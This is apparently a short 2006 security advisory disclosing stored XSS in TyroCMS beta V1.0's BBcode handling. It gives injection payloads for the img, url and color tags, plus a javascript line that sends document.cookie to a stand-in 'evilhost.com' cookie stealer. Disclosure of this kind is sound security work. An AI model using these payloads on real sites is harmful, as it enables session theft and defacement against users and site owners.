|
TyroCms beta V1.0 multiple XSS injections=0D
=0D
Discovered by: Nomenumbra=0D
Date: 5/2/2006=0D
impact:moderate (privilege escalation,possible defacement)=0D
=0D
TyroCMS is a PHP & MySql powered content management system(cms).=0D
Inludes built-in forums, powerful admin control panel, secure user system, and much more.=0D
Easily manage the site throuh the admin panel even if you do not have great webmastering skills! =0D
=0D
Due to the way BBcode is interprented by TyroCms it is possible to inject javascript in several statements like:=0D
In images:=0D
=0D
[img]javascript:alert('xss')[/img]=0D
=0D
or in urls:=0D
=0D
[url=x" onmouseover="alert('xss')]Site Name[/url]=0D
=0D
or in colors:=0D
=0D
[color=red" onmouseover="alert('xss')]lol[/color]=0D
=0D
See? We could inject javascript like this:=0D
=0D
javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)=0D
=0D
to steal cookies.=0D
=0D
Nomenumbra/[0x4F4C]=0D